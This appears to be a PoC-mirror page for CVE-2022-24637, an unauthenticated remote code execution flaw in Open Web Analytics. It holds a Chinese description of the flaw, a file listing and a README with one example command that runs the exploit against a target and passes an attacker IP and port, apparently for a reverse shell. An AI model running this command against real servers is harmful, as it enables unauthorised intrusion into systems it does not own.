Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-24637 PoC — Open Web Analytics Server 安全漏洞

Source
Associated Vulnerability
Title:Open Web Analytics Server 安全漏洞 (CVE-2022-24637)
Description:Open Web Analytics Server是用于Google Analytics 等商业 Web 分析工具的开源替代方案。 Open Web Analytics 1.7.4版本存在安全漏洞,该漏洞源于使用 php 生成的文件(而不是预期的 php 序列)不是由 PHP 解释器处理的。未经身份验证的攻击者可以通过缓冲哈希利用该漏洞获取敏感用户信息和管理员权限。
Description
Open Web Analytics (OWA) - Unauthenticated Remote Code Execution
Readme
# CVE-2022-24637
> Open Web Analytics (OWA) - Unauthenticated Remote Code Execution

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24637

## Example
```bash
python3 exploit.py -u admin -p hacker http://target.org 10.10.11.12 4444
```
File Snapshot

[4.0K] /data/pocs/9de67256ae0ecaf6ddf3e65c97774a5ef20c80cf ├── [7.0K] exploit.py ├── [1.0K] LICENSE └── [ 246] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.